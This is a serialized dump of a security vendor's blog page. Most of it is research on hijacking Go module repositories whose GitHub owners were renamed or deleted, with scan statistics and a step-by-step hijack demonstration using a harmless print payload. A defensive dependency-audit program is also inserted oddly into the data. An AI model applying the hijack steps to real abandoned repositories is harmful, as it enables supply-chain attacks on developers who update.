insights, enhancing the collective ability to combat cyber threats.",[43656,83986,83987],{"author":69301,"position":69302},[18,83988,83989],{},"Speed and efficiency in addressing vulnerabilities are not just operational goals; 
they are critical to cybersecurity success. By maintaining NVD 1.0, we're not just making a tool available – we're upholding a staple of the broader cybersecurity ecosystem. The changes brought on by NVD's 2.0 APIs will force development teams to redesign how CVE data is acquired, processed, and loaded, which will take significant time and testing. Our goal is to ensure that all vulnerability management operations designed for NVD 1.0 will function as needed until teams are ready to make the jump.",[18,83991,83992],{},"VulnCheck’s commitment to NVD 1.0 is just one part of our broader vision. We're also focused on facilitating a well-planned migration to NVD 2.0, ensuring that the cybersecurity community is equipped for future challenges.",[61,83994,83996],{"id":83995},"get-it-today","Get it Today",[18,83998,83999,84000,59],{},"Learn more about how we're supporting rapid and efficient vulnerability management and get access to the NVD 1.0 database ",[47,84001,305],{"href":84002},"\u002Fnvd",[18,84004,84005],{},"Other Community Platform tier resources we have available include:",[22,84007,84008,84014],{},[25,84009,84010,84013],{},[47,84011,22289],{"href":84012},"\u002Fxdb"," - an index of exploit proof of concept code in git repositories.",[25,84015,84016,84019],{},[47,84017,32933],{"href":84018},"\u002Fadvisories\u002Freport"," for responsible 
disclosure.",{"title":219,"searchDepth":220,"depth":220,"links":84021},[84022,84023,84024],{"id":83947,"depth":220,"text":83948},{"id":83963,"depth":220,"text":83964},{"id":83995,"depth":220,"text":83996},"2023-12-07",{"slug":84027},"nvd-why","\u002Fblog\u002Fnvd-why",{"title":83928,"description":83935},"blog\u002Fnvd-why",[33173],"ZagiIANW91GSRsrYBIHQWqGZqR0mnisVSNy-mKvmoEQ",{"id":84034,"title":84035,"articles":84036,"authors":84080,"body":84082,"date":84040,"description":84748,"extension":234,"image":7,"link":7,"meta":84749,"navigation":237,"path":84751,"seo":84752,"series":7,"stem":84753,"subtype":7,"tags":7,"__hash__":84754},"blog\u002Fblog\u002Fgo-repojacking.md","Hijackable Go Module Repositories",[84037,84041,84045,84049,84053,84057,84060,84062,84067,84071,84076],{"title":84038,"source":39566,"link":84039,"date":84040},"A widespread threat to industrial control systems.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F229","2023-12-04",{"title":84042,"source":14382,"link":84043,"date":84044},"15,000 Go Module Repositories on GitHub Vulnerable to Repojacking Attack","https:\u002F\u002Fthehackernews.com\u002F2023\u002F12\u002F15000-go-module-repositories-on-github.html?m=1","2023-12-05",{"title":84046,"source":84047,"link":84048,"date":61897},"Cyber Security Today, Dec. 
6, 2023 – Warnings about Russian-based cyber attacks, and more","IT World Canada","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-dec-6-2023-warnings-about-russian-based-cyber-attacks-and-more\u002F554631",{"title":84050,"source":84051,"link":84052,"date":61897},"Thousands of Go module repositories on GitHub are vulnerable to attack","MSN","https:\u002F\u002Fwww.msn.com\u002Fen-us\u002Fnews\u002Ftechnology\u002Fthousands-of-go-module-repositories-on-github-are-vulnerable-to-attack\u002Far-AA1l6kcK",{"title":84054,"source":84055,"link":84056,"date":61897},"Risky Biz News: US government agencies lag on logging compliance","Risky Business News","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fus-government-agencies-lag-on-logging?utm_source=post-email-title&publication_id=852612&post_id=139474790&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email",{"title":84058,"source":11233,"link":84059,"date":61897},"Repojacking attacks against over 15K Go module repositories likely","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Frepojacking-attacks-against-over-15k-go-module-repositories-likely",{"title":84050,"source":60960,"link":84061,"date":61897},"https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsecurity\u002Fthousands-of-go-module-repositories-on-github-are-vulnerable-to-attack",{"title":84063,"source":84064,"link":84065,"date":84066},"Iran behind attacks on PLCs.","The CyberWire Daily Podcast","https:\u002F\u002Fthecyberwire.com\u002Fpodcasts\u002Fdaily-podcast\u002F1959\u002Fnotes","2023-12-08",{"title":84068,"source":84069,"link":84070,"date":68288},"Number of incidents affecting GitHub, Bitbucket, GitLab, and Jira continues to rise - Help Net Security","Help Net Security","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2024\u002F08\u002F07\u002Fgithub-bitbucket-gitlab-jira-incidents\u002F",{"title":84072,"source":84073,"link":84074,"date":84075},"DevOps threats report released from GitProtect io","App 
Developer Magazine","https:\u002F\u002Fappdevelopermagazine.com\u002Fdevops-threats-report-released-from-gitprotect-io\u002F","2024-08-12",{"title":84077,"source":84078,"link":84079,"date":65178},"DevOps threats strike every few days","ChannelWise","https:\u002F\u002Fchannelwise.co.za\u002Fdevops-threats-strike-every-few-days\u002F",[84081],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":84083,"toc":84735},[84084,84087,84091,84116,84133,84142,84146,84162,84165,84202,84212,84221,84226,84230,84233,84244,84250,84253,84255,84258,84262,84274,84278,84286,84292,84299,84363,84367,84370,84431,84445,84451,84458,84464,84467,84485,84489,84496,84502,84506,84509,84523,84590,84596,84601,84606,84611,84615,84618,84718,84720,84732],[263,84085],{":list":84086,"ico":266,"title":84035},"[\"VulnCheck analyzed the Go module ecosystem looking for modules whose source code repository could be vulnerable to repository hijacking (repojacking).\",\"VulnCheck found more than 9,000 repositories are vulnerable to repojacking due to GitHub username changes.\",\"VulnCheck found more than 6,000 repositories were vulnerable to repojacking due to account deletion.\",\"Combined, these 15,000 repositories support more than 800,000 Go module-versions.\"]",[61,84088,84090],{"id":84089},"why-go-is-particularly-vulnerable-to-repojacking","Why Go is Particularly Vulnerable to Repojacking",[18,84092,84093,84094,1554,84099,84104,84105,982,84110,84115],{},"The Go module ecosystem is unique because it’s decentralized. Other packaging systems like ",[47,84095,84098],{"href":84096,"rel":84097},"https:\u002F\u002Fpypi.org\u002F",[51],"Pypi",[47,84100,84103],{"href":84101,"rel":84102},"https:\u002F\u002Fwww.npmjs.com\u002F",[51],"NPM"," require developers to create accounts to upload their packages. This gives the package platform the ability to moderate users and content. That isn’t the case with Go. 
Go developers publish modules by pushing their code to source control platforms like GitHub. Anyone can then instruct the ",[47,84106,84109],{"href":84107,"rel":84108},"https:\u002F\u002Fproxy.golang.org",[51],"Go module mirror",[47,84111,84114],{"href":84112,"rel":84113},"https:\u002F\u002Fpkg.go.dev",[51],"pkg.go.dev"," to cache the module’s details.",[18,84117,84118,84119,982,84122,84125,84126,84128,84129,59],{},"This decentralization makes Go module repositories particularly vulnerable to repojacking. A repository becomes vulnerable when the module author changes their username or deletes their account. At that time, an attacker can register the newly unused username, duplicate the module repository, and publish a new module to ",[886,84120,84121],{},"proxy.golang.org",[886,84123,84124],{},"pkg.go.dev",". A detailed step-by-step breakdown of how that is done and what the resulting ",[886,84127,84124],{}," page looks like can be found in ",[47,84130,84132],{"href":84131},"#appendix-a-hijacking-a-go-module-on-github","Appendix A",[18,84134,84135,84136,84141],{},"GitHub does have some protections against repojacking. Their ",[47,84137,84140],{"href":84138,"rel":84139},"https:\u002F\u002Fgithub.blog\u002F2018-04-18-new-tools-for-open-source-maintainers\u002F#popular-repository-namespace-retirement",[51],"popular repository namespace retirement"," feature prevents repojacking of any repository “that had more than 100 clones in the week leading up to the owner’s account being renamed or deleted.” That might sound reasonable, but it isn’t necessarily sufficient for Go. Go modules are typically cached by the Module mirror, so there is no real need to interact with or clone from the source repository. For some context, VulnCheck has an open source library hosted on GitHub that we use daily and has 170+ stars, but that repository has only seen 20 clones in the last week. 
Based on that, the 100 clones protection isn’t necessarily as good as GitHub might think it is.",[61,84143,84145],{"id":84144},"hunting-for-hijackable-go-modules","Hunting for Hijackable Go Modules",[18,84147,84148,84149,84154,84155,84158,84159,84161],{},"In June 2023, ",[47,84150,84153],{"href":84151,"rel":84152},"https:\u002F\u002Fblog.aquasec.com\u002Fgithub-dataset-research-reveals-millions-potentially-vulnerable-to-repojacking",[51],"Aquasec"," published research positing millions of hijackable GitHub repositories. Knowing that Go is particularly vulnerable to this attack vector, we set out to enumerate exactly how many Go module-versions might be affected. By ",[295,84156,84157],{},"module-version",", we mean a module plus all its versions. This is important to note because, as detailed in ",[47,84160,84132],{"href":84131},", after successfully hijacking the attacker's new module will be listed as an “updated” module for all of the old module-versions.",[18,84163,84164],{},"VulnCheck tracks more than 20 million Go module-versions. It’s not exactly a small dataset, but the algorithm for tracking down the repojackable modules is relatively straightforward:",[1789,84166,84167,84177,84180,84190,84193,84196],{},[25,84168,84169,84170,84173,84174,59],{},"For each module, infer the repository URL from the module name. For example, ",[886,84171,84172],{},"github.com\u002Fvulncheck-oss\u002Fgo-exploit"," is a Go module whose source is hosted at ",[47,84175,14297],{"href":14297,"rel":84176},[51],[25,84178,84179],{},"Attempt to connect to each repository.",[25,84181,84182,84183,84185,84186,84189],{},"An HTTP 301 response indicates a username change, a repository name change, or both. For our purposes, we validated that the repository name was the same (e.g. ",[886,84184,20558],{},"), but the username had changed. We also validated that the original user account (e.g. ",[886,84187,84188],{},"vulncheck-oss",") didn’t exist. 
That further weeded out things like repository transfers. The repositories that made it through all those steps were considered potentially vulnerable to repojacking.",[25,84191,84192],{},"An HTTP 404 response indicated the repository no longer exists. We then would see if the username still existed. If not, then this, too, is potentially vulnerable to repojacking.",[25,84194,84195],{},"An HTTP 200 response indicated the repository was not vulnerable.",[25,84197,84198,84199,84201],{},"We then validated that the potentially hijackable repository actually had an entry in ",[886,84200,84124],{}," (you can cache pretty much anything with the Module mirror, so it’s important to weed out non-Go module stuff).",[18,84203,84204,84205,84207,84208,84211],{},"What you have left over is a lot of repositories that could be repojacked (assuming the 100 clones in the last seven days issue isn’t a problem). Our first finding is that more than ",[295,84206,65874],{}," Go module GitHub repositories are vulnerable to repojacking due to a username change. The potential repojacking affects more than ",[295,84209,84210],{},"500,000"," Go module-versions.",[18,84213,84214,84215,84220],{},"In order to determine how popular the repositories are, we grabbed each repositories’ number of GitHub ",[47,84216,84219],{"href":84217,"rel":84218},"https:\u002F\u002Fdocs.github.com\u002Fen\u002Fget-started\u002Fexploring-projects-on-github\u002Fsaving-repositories-with-stars",[51],"stars",". We’ve graphed the results in buckets from 0 to 1000.",[1925,84222,84223],{},[18,84224,84225],{},"Hijackable Go Module Repositories Grouped by Stars",[11128,84227],{":labels":84228,":values":84229},"[0,\"1-10\",\"11-50\",\"51-100\",\"101-200\",\"201-500\",\"501-1000\"]","[5995,1968,705,210,147,105,50]",[18,84231,84232],{},"The majority of the repositories have zero stars. Those are of little to no value to an attacker. The remaining 3,000 repositories have between 1 and 1000 stars. 
The likelihood of a repository being valuable to an attacker increases with stars, but stars alone can’t say how useful an attack might be. The actual usage within the Go ecosystem matters, because exploitation relies on a developer updating to the new module.",[18,84234,84235,84236,84239,84240,84243],{},"The other category we tracked is repositories that are hijackable because the GitHub account had been deleted. We identified more than ",[295,84237,84238],{},"6,000"," of this type of repository, ultimately affecting nearly ",[295,84241,84242],{},"300,000"," module-versions. Because the repositories have been deleted, we can’t find how many stars they have. An attacker would have to rely on finding usage patterns - ultimately searching for imports of the code.",[18,84245,84246],{},[68,84247],{":width":10862,"alt":84248,"src":84249},"Searching abandoned usage on GitHub","\u002Fblog\u002Fgo-repojacking\u002Fusage-pattern.png",[18,84251,84252],{},"That’s a heavy lift, but worthwhile for the right attacker. Still, even finding use in the wild isn’t enough. Ultimately, the victim will need to update to the attacker’s new module, because the attacker cannot overwrite old modules. So, while the threat is real, repojacking within the Go ecosystem is not an immediate win for the attacker.",[61,84254,1903],{"id":1902},[18,84256,84257],{},"Unfortunately, mitigating all of these repojackings is something that either Go or GitHub will have to take on. A third-party can’t reasonably register 15,000 GitHub accounts. Until then, it’s important for Go developers to be aware of the modules they use, and the state of the repository that the modules originated from.",[61,84259,84261],{"id":84260},"appendix-a-hijacking-a-go-module-on-github","Appendix A: Hijacking a Go Module on GitHub",[18,84263,84264,84265,84267,84268,84270,84271,84273],{},"Once published, a Go module is available via ",[886,84266,84121],{},". This ensures that modules can’t be deleted. 
Disappearing modules would break downstream software, which is something no one wants. However, ",[886,84269,84121],{}," is not a centralized repository like Pypi, Gem, or NPM. It’s simply a proxy and cache. When the source of the Go module is deleted or moved, ",[886,84272,84121],{}," is unaware (or doesn’t care). The result is that anyone can hijack those modules. Let’s walk through the steps of how that works.",[993,84275,84277],{"id":84276},"step-1-dev-a-creates-a-github-repository-and-makes-a-go-module","Step 1: Dev-A creates a GitHub repository and makes a Go module",[18,84279,84280,84281,84285],{},"In the example below, Dev-A created ",[47,84282,84283],{"href":84283,"rel":84284},"https:\u002F\u002Fgithub.com\u002Fvcresearcher\u002Fhelloworld",[51],". They added code to create the Helloworld module, and tagged it version 1.0.0.",[18,84287,84288],{},[68,84289],{":width":10862,"alt":84290,"src":84291},"A wild new repo appears","\u002Fblog\u002Fgo-repojacking\u002Fnew-repo.png",[18,84293,84294,84295,84298],{},"The module's ",[886,84296,84297],{},"hello.go"," file contains one function for other developers to use:",[1354,84300,84302],{"className":19022,"code":84301,"filename":84297,"language":19024,"meta":219,"style":219},"package helloworld\n\nimport \"fmt\"\n\nfunc Hello() {\n    fmt.Println(\"hi.\")\n}\n",[886,84303,84304,84311,84315,84325,84329,84340,84359],{"__ignoreMap":219},[1373,84305,84306,84308],{"class":1375,"line":1376},[1373,84307,19031],{"class":1397},[1373,84309,84310],{"class":14938}," 
helloworld\n",[1373,84312,84313],{"class":1375,"line":220},[1373,84314,6520],{"emptyLinePlaceholder":237},[1373,84316,84317,84319,84321,84323],{"class":1375,"line":1266},[1373,84318,19043],{"class":4636},[1373,84320,4883],{"class":1387},[1373,84322,19054],{"class":19053},[1373,84324,19057],{"class":1387},[1373,84326,84327],{"class":1375,"line":1852},[1373,84328,6520],{"emptyLinePlaceholder":237},[1373,84330,84331,84333,84336,84338],{"class":1375,"line":4692},[1373,84332,19088],{"class":1397},[1373,84334,84335],{"class":7297}," Hello",[1373,84337,7514],{"class":1383},[1373,84339,4765],{"class":1383},[1373,84341,84342,84344,84346,84348,84350,84352,84355,84357],{"class":1375,"line":4724},[1373,84343,19129],{"class":4640},[1373,84345,59],{"class":1383},[1373,84347,19134],{"class":7297},[1373,84349,1384],{"class":1383},[1373,84351,183],{"class":1387},[1373,84353,84354],{"class":1391},"hi.",[1373,84356,183],{"class":1387},[1373,84358,11875],{"class":1383},[1373,84360,84361],{"class":1375,"line":4756},[1373,84362,1855],{"class":1383},[993,84364,84366],{"id":84365},"step-2-dev-b-imports-the-helloworld-module","Step 2: Dev-B imports the HelloWorld module",[18,84368,84369],{},"Another developer, Dev-B, sees the super cool Helloworld module and decides to use it in their new project.",[1354,84371,84374],{"className":19022,"code":84372,"filename":84373,"language":19024,"meta":219,"style":219},"\npackage main\n\nimport \"github.com\u002Fvcresearcher\u002Fhelloworld\"\n\nfunc main() {\n    
helloworld.Hello()\n}\n","main.go",[886,84375,84376,84380,84386,84390,84401,84405,84415,84427],{"__ignoreMap":219},[1373,84377,84378],{"class":1375,"line":1376},[1373,84379,6520],{"emptyLinePlaceholder":237},[1373,84381,84382,84384],{"class":1375,"line":220},[1373,84383,19031],{"class":1397},[1373,84385,19034],{"class":14938},[1373,84387,84388],{"class":1375,"line":1266},[1373,84389,6520],{"emptyLinePlaceholder":237},[1373,84391,84392,84394,84396,84399],{"class":1375,"line":1852},[1373,84393,19043],{"class":4636},[1373,84395,4883],{"class":1387},[1373,84397,84398],{"class":19053},"github.com\u002Fvcresearcher\u002Fhelloworld",[1373,84400,19057],{"class":1387},[1373,84402,84403],{"class":1375,"line":4692},[1373,84404,6520],{"emptyLinePlaceholder":237},[1373,84406,84407,84409,84411,84413],{"class":1375,"line":4724},[1373,84408,19088],{"class":1397},[1373,84410,19186],{"class":7297},[1373,84412,7514],{"class":1383},[1373,84414,4765],{"class":1383},[1373,84416,84417,84420,84422,84425],{"class":1375,"line":4756},[1373,84418,84419],{"class":4640},"    helloworld",[1373,84421,59],{"class":1383},[1373,84423,84424],{"class":7297},"Hello",[1373,84426,27326],{"class":1383},[1373,84428,84429],{"class":1375,"line":4768},[1373,84430,1855],{"class":1383},[18,84432,84433,84434,982,84437,84440,84441,84444],{},"After running ",[886,84435,84436],{},"go mod init",[886,84438,84439],{},"go mod tidy",", Dev-B's ",[886,84442,84443],{},"go.mod"," looks like so:",[1354,84446,84449],{"className":84447,"code":84448,"language":1359,"meta":219},[1357],"module github.com\u002Fvcresearcher\u002Fhelloworld-impl\n\ngo 1.21.0\n\nrequire github.com\u002Fvcresearcher\u002Fhelloworld v1.0.0\n",[886,84450,84448],{"__ignoreMap":219},[18,84452,84453,84454,84457],{},"Dev-B's project dependency listing (",[886,84455,84456],{},"go list -m -u all",") now looks 
like:",[1354,84459,84462],{"className":84460,"code":84461,"language":1359,"meta":219},[1357],"github.com\u002Fvcresearcher\u002Fhelloworld-impl\ngithub.com\u002Fvcresearcher\u002Fhelloworld v1.0.0\n",[886,84463,84461],{"__ignoreMap":219},[18,84465,84466],{},"And, finally, when Dev-B executes their program, they get the following output:",[1354,84468,84470],{"className":31740,"code":84469,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fhelloworld-impl$ .\u002Fhelloworld-impl\nhi.\n",[886,84471,84472,84480],{"__ignoreMap":219},[1373,84473,84474,84477],{"class":1375,"line":1376},[1373,84475,84476],{"class":2206},"albinolobster@mournland:~\u002Fhelloworld-impl$",[1373,84478,84479],{"class":1391}," .\u002Fhelloworld-impl\n",[1373,84481,84482],{"class":1375,"line":220},[1373,84483,84484],{"class":2206},"hi.\n",[993,84486,84488],{"id":84487},"step-3-dev-a-changes-their-github-username","Step 3: Dev-A changes their GitHub username",[18,84490,84491,84492,59],{},"Dev-A changes their username from vcresearcher to vclabresearch. 
GitHub automatically moves the helloworld repository to ",[47,84493,84494],{"href":84494,"rel":84495},"https:\u002F\u002Fgithub.com\u002Fvclabresearch\u002Fhelloworld",[51],[18,84497,84498],{},[68,84499],{":width":10862,"alt":84500,"src":84501},"What is old is new again","\u002Fblog\u002Fgo-repojacking\u002Fmoved-repo.png",[993,84503,84505],{"id":84504},"step-4-attacker-hijacks-the-original-git-repository","Step 4: Attacker hijacks the original git repository",[18,84507,84508],{},"When Dev-A changed their username from vcresearcher to vclabresearch, GitHub moved their repositories to the new username and set up HTTP redirects so that any request to vcresearcher\u002Fhelloworld redirects to vclabresearch\u002Fhelloworld.",[18,84510,84511,84512,84515,84516,84519,84520,84522],{},"Attacker registers as ",[886,84513,84514],{},"vcresearcher",", creates a repository called ",[886,84517,84518],{},"helloworld",", and uploads the original repository's content. This exactly matches the original repository created by Dev-A, and because the old path is occupied again, GitHub's redirect no longer applies: the original import path now resolves to Attacker's repository. 
Attacker then updates ",[886,84521,84297],{}," with \"malicious\" code.",[1354,84524,84527],{"className":19022,"code":84525,"filename":84526,"language":19024,"meta":219,"style":219},"\npackage helloworld\n\nimport \"fmt\"\n\nfunc Hello() {\n    fmt.Println(\"hi world 😈\")\n}\n","helloworld.go",[886,84528,84529,84533,84539,84543,84553,84557,84567,84586],{"__ignoreMap":219},[1373,84530,84531],{"class":1375,"line":1376},[1373,84532,6520],{"emptyLinePlaceholder":237},[1373,84534,84535,84537],{"class":1375,"line":220},[1373,84536,19031],{"class":1397},[1373,84538,84310],{"class":14938},[1373,84540,84541],{"class":1375,"line":1266},[1373,84542,6520],{"emptyLinePlaceholder":237},[1373,84544,84545,84547,84549,84551],{"class":1375,"line":1852},[1373,84546,19043],{"class":4636},[1373,84548,4883],{"class":1387},[1373,84550,19054],{"class":19053},[1373,84552,19057],{"class":1387},[1373,84554,84555],{"class":1375,"line":4692},[1373,84556,6520],{"emptyLinePlaceholder":237},[1373,84558,84559,84561,84563,84565],{"class":1375,"line":4724},[1373,84560,19088],{"class":1397},[1373,84562,84335],{"class":7297},[1373,84564,7514],{"class":1383},[1373,84566,4765],{"class":1383},[1373,84568,84569,84571,84573,84575,84577,84579,84582,84584],{"class":1375,"line":4756},[1373,84570,19129],{"class":4640},[1373,84572,59],{"class":1383},[1373,84574,19134],{"class":7297},[1373,84576,1384],{"class":1383},[1373,84578,183],{"class":1387},[1373,84580,84581],{"class":1391},"hi world 😈",[1373,84583,183],{"class":1387},[1373,84585,11875],{"class":1383},[1373,84587,84588],{"class":1375,"line":4768},[1373,84589,1855],{"class":1383},[18,84591,84592,84593,59],{},"Attacker then publishes the module as version ",[886,84594,84595],{},"v1.0.3",[18,84597,84598],{},[68,84599],{":width":10862,"alt":84500,"src":84600},"\u002Fblog\u002Fgo-repojacking\u002Fhijacked-repo.png",[18,84602,84603,84604,59],{},"Finally, Attacker tells the Go Module Proxy to grab the updated version. 
The new version is merged with the old versions in ",[886,84605,84124],{},[18,84607,84608],{},[68,84609],{":width":10862,"alt":84500,"src":84610},"\u002Fblog\u002Fgo-repojacking\u002Fpkgupdated.png",[993,84612,84614],{"id":84613},"step-5-dev-b-checks-for-helloworld-module-updates-and-pulls-in-attackers-malicious-package","Step 5: Dev-B checks for helloworld module updates and pulls in Attacker’s \"malicious\" package",[18,84616,84617],{},"In the output below, Dev-B checks the available updates for their Go program. They see a new version of the helloworld module, they fetch it, and subsequently execute Attacker’s code.",[1354,84619,84621],{"className":31740,"code":84620,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fhelloworld-impl$ go list -m -u all\ngithub.com\u002Fvcresearcher\u002Fhelloworld-impl\ngithub.com\u002Fvcresearcher\u002Fhelloworld v1.0.1 [v1.0.3]\nalbinolobster@mournland:~\u002Fhelloworld-impl$ nano go.mod\nalbinolobster@mournland:~\u002Fhelloworld-impl$ go mod tidy\ngo: downloading github.com\u002Fvcresearcher\u002Fhelloworld v1.0.3\nalbinolobster@mournland:~\u002Fhelloworld-impl$ go build\nalbinolobster@mournland:~\u002Fhelloworld-impl$ .\u002Fhelloworld-impl\nhi world. 
😈\n",[886,84622,84623,84641,84646,84656,84666,84678,84692,84701,84707],{"__ignoreMap":219},[1373,84624,84625,84627,84630,84632,84635,84638],{"class":1375,"line":1376},[1373,84626,84476],{"class":2206},[1373,84628,84629],{"class":1391}," go",[1373,84631,55812],{"class":1391},[1373,84633,84634],{"class":2209}," -m",[1373,84636,84637],{"class":2209}," -u",[1373,84639,84640],{"class":1391}," all\n",[1373,84642,84643],{"class":1375,"line":220},[1373,84644,84645],{"class":2206},"github.com\u002Fvcresearcher\u002Fhelloworld-impl\n",[1373,84647,84648,84650,84653],{"class":1375,"line":1266},[1373,84649,84398],{"class":2206},[1373,84651,84652],{"class":1391}," v1.0.1",[1373,84654,84655],{"class":4640}," [v1.0.3]\n",[1373,84657,84658,84660,84663],{"class":1375,"line":1852},[1373,84659,84476],{"class":2206},[1373,84661,84662],{"class":1391}," nano",[1373,84664,84665],{"class":1391}," go.mod\n",[1373,84667,84668,84670,84672,84675],{"class":1375,"line":4692},[1373,84669,84476],{"class":2206},[1373,84671,84629],{"class":1391},[1373,84673,84674],{"class":1391}," mod",[1373,84676,84677],{"class":1391}," tidy\n",[1373,84679,84680,84683,84686,84689],{"class":1375,"line":4724},[1373,84681,84682],{"class":2206},"go:",[1373,84684,84685],{"class":1391}," downloading",[1373,84687,84688],{"class":1391}," github.com\u002Fvcresearcher\u002Fhelloworld",[1373,84690,84691],{"class":1391}," v1.0.3\n",[1373,84693,84694,84696,84698],{"class":1375,"line":4756},[1373,84695,84476],{"class":2206},[1373,84697,84629],{"class":1391},[1373,84699,84700],{"class":1391}," build\n",[1373,84702,84703,84705],{"class":1375,"line":4768},[1373,84704,84476],{"class":2206},[1373,84706,84479],{"class":1391},[1373,84708,84709,84712,84715],{"class":1375,"line":4792},[1373,84710,84711],{"class":2206},"hi",[1373,84713,84714],{"class":1391}," world.",[1373,84716,84717],{"class":1391}," 😈\n",[61,84719,202],{"id":201},[18,84721,84722,84723,84728,84729,63288],{},"The VulnCheck Exploit & Vulnerability team tracks 
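The five steps above show how a renamed (or deleted) GitHub account leaves a module path open to a new owner. The check a Go team actually wants is the mirror image: an audit of their own dependencies for that condition. The program below is an added example written for this page, not VulnCheck's scanner or Go tooling. It pulls every github.com requirement out of a go.mod (or `go list -m all` output) and asks GitHub, without following redirects, whether the repository still answers at its original path: a 301 means the owner was renamed or the repository transferred (Step 3), a 404 means the account or repository is gone (or private). The resolver is injected so the logic runs offline against a constructed go.mod; the modules example-org/widget and deleted-user/oldlib are hypothetical names. Keep the caveat from the walkthrough in mind: versions already recorded in go.sum and cached by the proxy are not at risk, the exposure is the next `go get -u` that picks up a tag the new owner pushed.

```go
package main

import (
	"bufio"
	"fmt"
	"net/http"
	"regexp"
	"strings"
)

// Status is what GitHub serves today at the path the Go toolchain fetches a module from.
type Status string

const (
	StatusOK         Status = "ok"         // repository still answers at its original path
	StatusRedirected Status = "redirected" // owner renamed or repo transferred (Step 3): old path may be claimable
	StatusMissing    Status = "missing"    // account or repo deleted (or private): old path may be free to claim
	StatusUnknown    Status = "unknown"    // network error or unexpected response
)

// Resolver answers "what does GitHub return for github.com/<owner>/<repo>?"; injected so the audit can run offline.
type Resolver func(owner, repo string) (Status, error)

// Result is the verdict for one GitHub-hosted requirement.
type Result struct {
	Module string
	Status Status
	Err    error
}

// reRequire matches "require github.com/o/r v1.2.3", an indented line inside a require
// block, or a line of "go list -m all" output. A /vN suffix belongs to the module path, not the repo.
var reRequire = regexp.MustCompile(`^\s*(?:require\s+)?(github\.com/([^/\s]+)/([^/\s]+)(?:/\S+)?)\s+v\S+`)

// Audit extracts every GitHub-hosted requirement (one query per repository, since several
// modules can share one) and asks the resolver whether the repository still sits where the toolchain will look.
func Audit(goMod string, resolve Resolver) []Result {
	var out []Result
	seen := map[string]bool{}
	sc := bufio.NewScanner(strings.NewReader(goMod))
	for sc.Scan() {
		m := reRequire.FindStringSubmatch(sc.Text())
		if m == nil || seen[m[2]+"/"+m[3]] {
			continue
		}
		seen[m[2]+"/"+m[3]] = true
		st, err := resolve(m[2], m[3])
		out = append(out, Result{Module: m[1], Status: st, Err: err})
	}
	return out
}

// GitHubResolver is the live check. Redirects are deliberately not followed: GitHub answers
// 301 for a renamed owner or transferred repo and 404 when the account or repo is gone.
// A private repo also returns 404, so confirm a "missing" verdict by hand.
func GitHubResolver(owner, repo string) (Status, error) {
	client := &http.Client{CheckRedirect: func(*http.Request, []*http.Request) error { return http.ErrUseLastResponse }}
	resp, err := client.Head("https://github.com/" + owner + "/" + repo)
	if err != nil {
		return StatusUnknown, err
	}
	defer resp.Body.Close()
	switch resp.StatusCode {
	case http.StatusOK:
		return StatusOK, nil
	case http.StatusMovedPermanently, http.StatusFound, http.StatusTemporaryRedirect, http.StatusPermanentRedirect:
		return StatusRedirected, nil
	case http.StatusNotFound:
		return StatusMissing, nil
	}
	return StatusUnknown, fmt.Errorf("unexpected HTTP %d for %s/%s", resp.StatusCode, owner, repo)
}

// SampleGoMod is a constructed go.mod: the walkthrough's helloworld module plus two hypothetical
// dependencies. SampleResolver fakes GitHub's answers for it so the program runs offline;
// pass a real go.mod and GitHubResolver to Audit for a live check.
const SampleGoMod = `module github.com/vcresearcher/helloworld-impl

go 1.21.0
require (
	github.com/vcresearcher/helloworld v1.0.0
	github.com/example-org/widget/v2 v2.3.1 // indirect
	github.com/deleted-user/oldlib v0.4.0
	golang.org/x/text v0.14.0
)
`

func SampleResolver(owner, repo string) (Status, error) {
	switch owner + "/" + repo {
	case "vcresearcher/helloworld": // Dev-A renamed the account, so GitHub now redirects
		return StatusRedirected, nil
	case "example-org/widget":
		return StatusOK, nil
	}
	return StatusMissing, nil
}

func main() {
	for _, r := range Audit(SampleGoMod, SampleResolver) {
		fmt.Printf("%-10s %s\n", r.Status, r.Module)
	}
}
```

Run it in CI next to `go mod verify`. A "redirected" result is the Step 3 situation: either move the import to the new path before someone else registers the old name, or vendor the module. A "missing" result means the old path may already be claimable and deserves a look at who, if anyone, now owns it.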
",[47,84724,84727],{"href":84725,"rel":84726},"https:\u002F\u002Fdocs.vulncheck.com\u002Fexploit-and-vulnerability-intelligence\u002Fpackage-manager-support",[51],"more than a dozen package managers"," including NPM, Pypi, and Maven. For details, sign up to start a trial of our ",[47,84730,216],{"href":214,"rel":84731},[51],[2901,84733,84734],{},"html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sP9PO, html code.shiki .sP9PO{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#E6DB74}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki 